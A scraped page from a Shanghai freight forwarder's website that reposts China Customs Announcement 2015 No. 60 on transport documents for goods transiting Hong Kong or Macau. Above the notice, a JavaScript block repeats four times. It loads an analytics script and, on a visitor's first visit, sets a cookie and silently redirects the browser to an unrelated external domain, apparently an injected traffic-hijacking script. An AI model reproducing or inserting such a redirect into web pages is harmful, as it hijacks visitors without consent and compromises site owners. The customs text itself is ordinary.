var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } 海关总署公告2015年第60号-上海翡柏国际货运代理有限公司
栏目导航
新闻搜索
文章正文
海关总署公告2015年第60号
作者:管理员    发布于:2016-04-14 16:40:20    文字:【】【】【
 为便利各优惠贸易安排中“直接运输”条款的实施,现就经香港或澳门中转货物单证提交相关事宜公告如下:
一、收货人或者其代理人(以下统称“进口人”)申报适用协定税率或特惠税率时向海关提交下列运输单证之一的,海关不再要求提交中转确认书或者未再加工证明:
(一)对空运或海运进口货物,经营国际快递业务的企业、民用航空运输企业、国际班轮运输经营者及其委托代理人出具的单份运输单证。该运输单证应在同一页上载明始发地为进口货物的原产国(地区)境内,且目的地为中国境内;原产于内陆国家(地区)的海运进口货物,始发地可为其海运始发地。 
(二)对已实现原产地电子数据交换的《海峡两岸经济合作框架协议》(ECFA)等协定项下集装箱运输货物,也可提交能够证明货物在运输过程中集装箱箱号、封志号未发生变动的全程运输单证。
二、不符合上述两种情形的,进口人应按照以下规定提交中转确认书或未再加工证明:
(一)对于在香港或澳门中转的非集装箱运输货物,以及中转期间非因预检验开箱的集装箱运输货物,应提交香港或澳门海关签发的中转确认书。 
(二)中转期间进行预检验的集装箱运输货物,应提交中国检验(香港)公司或澳门中国检验公司签发的未再加工证明。 
(三)对于中转期间未开箱的集装箱运输货物,应提交香港或澳门海关签发的中转确认书,或者中国检验(香港)公司或澳门中国检验公司签发的未再加工证明。
海关对上述单证有疑问的,进口人应当补充提交相关资料。
本公告自2015年12月20日起执行。

海关总署
2015年12月18日
脚注信息
版权所有 Copyright(C)2009-2019 上海翡柏国际货运代理有限公司 ICP备案号/许可证编号:沪ICP备18010878号

广告位